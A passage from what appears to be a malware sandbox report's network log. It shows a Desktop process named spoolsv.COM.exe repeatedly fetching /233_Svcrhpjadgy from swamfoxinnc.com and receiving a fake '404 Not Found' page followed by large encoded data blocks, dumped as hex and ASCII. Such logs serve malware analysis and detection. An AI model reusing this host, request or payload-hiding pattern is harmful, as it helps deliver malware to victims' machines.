                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:38:47 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:38:47 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.2.1049894176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:38:49 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:38:50 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:38:50 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:38:50 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:38:51 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:38:51 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:38:51 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            21192.168.2.1049904176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:38:52 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:38:54 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:38:54 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:38:54 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:38:54 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:38:54 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:38:54 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            22192.168.2.1049913176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:38:56 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:38:57 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:38:57 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:38:57 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:38:57 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
                                                                            Data Ascii: 57Co2GLLyEyOHa4j0DeAooXsQlEL/ER9yxkrMCp0AzhSHBRbgKPIGyHbQOnmVSbsVIwqDm5zWCTRXdjRcc/HM7CfdT4ETr4QRNSw0fKOMaNaz/hGzQsjnWkjj/ogrDUY9U6lwyw+HFlu8eHIsK8OTX133aXT89Qc3xmFbE5YJKnR1U+mesNiLSwHkSHb1Oen7Qu0CWmZiws571YYY+sntZrcY+vF+eFWSXLc6fB8OI0K/WJ00/GfaAThsedC8oT
                                                                            2024-12-23 06:38:57 UTC16384INData Raw: 5a 4a 76 46 56 68 6b 45 41 34 6b 30 52 43 77 6d 44 6a 47 4f 69 73 37 51 6a 44 65 4d 71 43 61 78 50 50 79 42 4d 57 33 62 4d 35 34 6c 33 2b 70 53 71 59 37 2b 72 2f 53 6b 67 55 62 4a 4d 70 6a 42 6a 33 6e 38 34 6d 37 75 57 31 49 31 51 67 43 49 63 6b 72 46 6b 51 44 63 42 33 41 42 6a 4b 39 35 78 43 36 31 4e 77 42 50 4e 63 78 6f 53 41 52 49 7a 48 37 65 57 6a 63 35 58 6b 70 2f 39 49 75 6f 41 6d 41 6f 67 4a 6d 46 5a 35 32 4c 49 73 67 72 41 41 49 41 67 45 41 70 76 79 66 46 53 39 41 49 79 67 63 66 4b 36 2f 2f 46 35 43 59 6c 78 47 51 53 55 53 4e 53 62 6e 51 79 31 34 71 55 50 64 48 42 74 35 41 4a 72 36 46 46 31 4b 79 50 66 2b 62 52 46 6f 72 2b 6f 76 4c 6a 46 63 7a 48 6b 6a 58 7a 61 58 67 71 35 6c 49 35 77 49 33 61 77 44 34 69 53 53 4d 4b 4f 6e 6d 50 53 48 52 6b 6e 46
                                                                            Data Ascii: ZJvFVhkEA4k0RCwmDjGOis7QjDeMqCaxPPyBMW3bM54l3+pSqY7+r/SkgUbJMpjBj3n84m7uW1I1QgCIckrFkQDcB3ABjK95xC61NwBPNcxoSARIzH7eWjc5Xkp/9IuoAmAogJmFZ52LIsgrAAIAgEApvyfFS9AIygcfK6//F5CYlxGQSUSNSbnQy14qUPdHBt5AJr6FF1KyPf+bRFor+ovLjFczHkjXzaXgq5lI5wI3awD4iSSMKOnmPSHRknF
                                                                            2024-12-23 06:38:58 UTC9335INData Raw: 6e 45 73 42 71 4c 41 57 49 56 70 54 58 74 33 48 59 58 4e 54 4f 54 36 2b 68 64 31 4c 52 42 30 66 69 31 34 58 79 33 75 36 45 34 59 4e 71 53 35 6d 73 32 78 66 73 71 37 68 4e 4a 4c 73 39 68 42 74 78 51 63 50 35 57 73 52 73 58 4e 59 68 61 6f 69 37 45 44 76 32 4a 66 46 67 4d 44 52 4b 50 59 6e 69 6d 63 78 56 55 59 6c 4f 45 77 39 77 71 48 48 36 42 50 62 7a 70 37 4b 33 58 53 61 62 53 4d 74 77 32 7a 61 42 6d 65 55 6d 4a 54 52 48 36 63 5a 4d 2f 2f 32 31 72 4d 58 4e 35 33 36 56 66 44 58 43 31 53 44 71 75 61 36 74 44 4e 72 32 6d 65 48 65 6d 2b 59 6c 33 52 6b 36 53 49 70 5a 56 35 56 4e 34 32 6c 33 44 30 6a 57 6c 58 74 31 37 6e 32 33 4e 59 52 5a 54 79 38 6b 78 55 68 37 43 30 47 4c 64 5a 63 54 73 76 77 46 79 59 31 50 79 64 4a 78 5a 6d 4b 71 48 77 6e 49 67 49 6e 5a 43 30
                                                                            Data Ascii: nEsBqLAWIVpTXt3HYXNTOT6+hd1LRB0fi14Xy3u6E4YNqS5ms2xfsq7hNJLs9hBtxQcP5WsRsXNYhaoi7EDv2JfFgMDRKPYnimcxVUYlOEw9wqHH6BPbzp7K3XSabSMtw2zaBmeUmJTRH6cZM//21rMXN536VfDXC1SDqua6tDNr2meHem+Yl3Rk6SIpZV5VN42l3D0jWlXt17n23NYRZTy8kxUh7C0GLdZcTsvwFyY1PydJxZmKqHwnIgInZC0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            23192.168.2.1049924176.123.5.1434437596C:\Users\user\Desktop\spoolsv.COM.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 06:38:59 UTC164OUTGET /233_Svcrhpjadgy HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: swamfoxinnc.com
                                                                            2024-12-23 06:39:01 UTC191INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 23 Dec 2024 06:39:00 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 58296
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "674db0b4-e3b8"
                                                                            2024-12-23 06:39:01 UTC16193INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a
                                                                            Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {
                                                                            2024-12-23 06:39:01 UTC16384INData Raw: 35 37 43 6f 32 47 4c 4c 79 45 79 4f 48 61 34 6a 30 44 65 41 6f 6f 58 73 51 6c 45 4c 2f 45 52 39 79 78 6b 72 4d 43 70 30 41 7a 68 53 48 42 52 62 67 4b 50 49 47 79 48 62 51 4f 6e 6d 56 53 62 73 56 49 77 71 44 6d 35 7a 57 43 54 52 58 64 6a 52 63 63 2f 48 4d 37 43 66 64 54 34 45 54 72 34 51 52 4e 53 77 30 66 4b 4f 4d 61 4e 61 7a 2f 68 47 7a 51 73 6a 6e 57 6b 6a 6a 2f 6f 67 72 44 55 59 39 55 36 6c 77 79 77 2b 48 46 6c 75 38 65 48 49 73 4b 38 4f 54 58 31 33 33 61 58 54 38 39 51 63 33 78 6d 46 62 45 35 59 4a 4b 6e 52 31 55 2b 6d 65 73 4e 69 4c 53 77 48 6b 53 48 62 31 4f 65 6e 37 51 75 30 43 57 6d 5a 69 77 73 35 37 31 59 59 59 2b 73 6e 74 5a 72 63 59 2b 76 46 2b 65 46 57 53 58 4c 63 36 66 42 38 4f 49 30 4b 2f 57 4a 30 30 2f 47 66 61 41 54 68 73 65 64 43 38 6f 54
